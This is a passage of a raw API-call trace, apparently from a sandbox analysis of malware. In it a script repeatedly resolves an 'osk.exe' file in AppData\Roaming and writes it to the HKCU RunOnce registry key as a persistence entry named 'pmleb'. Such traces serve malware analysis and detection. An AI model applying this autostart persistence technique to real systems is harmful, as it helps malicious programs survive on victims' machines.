wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.498] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.498] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.498] KillTimer (hWnd=0x20280, uIDEvent=0x20f3) returned 1 [0082.499] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.499] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.499] IUnknown:Release (This=0x787518) returned 0x1 [0082.499] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.499] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.499] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.499] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.499] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.500] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.500] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0082.500] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.500] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0082.500] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.501] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0082.501] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.501] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.501] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.501] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.501] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.501] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.501] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.502] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.502] RegCloseKey (hKey=0x280) returned 0x0 [0082.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.502] SetTimer (hWnd=0x20280, nIDEvent=0x20f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f4 [0082.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.514] KillTimer (hWnd=0x20280, uIDEvent=0x20f4) returned 1 [0082.514] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.514] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.514] IUnknown:Release (This=0x787518) returned 0x1 [0082.515] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.515] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.515] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.515] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.515] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.515] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0082.515] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.515] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0082.515] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.516] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0082.516] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.516] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.516] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.516] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.516] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.517] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.517] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.517] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.517] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.517] RegCloseKey (hKey=0x280) returned 0x0 [0082.517] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.517] SetTimer (hWnd=0x20280, nIDEvent=0x20f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f5 [0082.517] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.529] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.529] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.530] KillTimer (hWnd=0x20280, uIDEvent=0x20f5) returned 1 [0082.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.530] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.530] IUnknown:Release (This=0x787518) returned 0x1 [0082.530] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.530] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.530] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.530] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.530] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.531] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.531] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0082.531] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.531] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0082.531] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.531] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0082.532] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.532] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.532] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.532] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.532] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.532] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.532] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.532] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.532] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 